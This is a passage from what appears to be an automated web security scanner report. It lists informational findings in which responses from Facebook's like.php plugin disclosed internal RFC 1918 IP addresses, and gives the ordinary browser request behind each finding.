User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.883. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.22.54

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cc2374ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.884. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.215.48

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fc1d809c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.885. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.47.65

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f688725%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.886. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.213.65

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ac8453ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.887. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.29.44

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa0e6822%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.888. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.8.104

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfedd4a6bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.889. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.106.37

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5715ef3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb46cff4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.890. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.226.43

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cfe77904%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.891. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.93.35

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2492d61c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.892. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.225.49

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df262db5da4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.893. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.109.54

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd42320c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3306de7a4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.894. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.181.36

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33a924acc%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ffacebook.com%2FWSJ&layout=button_count&locale=en_US&node_type=link&ref=WSJ_homepage&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.895. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.189.47

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df756873f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2519325b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.896. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.155.65

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe01abf48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.897. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.69.42

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df652b1054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.898. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.191.51

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9895aaec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.899. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.123.57

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9f0d99e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.900. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.90.55

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37df6f508%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23d30ecb4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.901. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.224.123

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25fc7b33c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

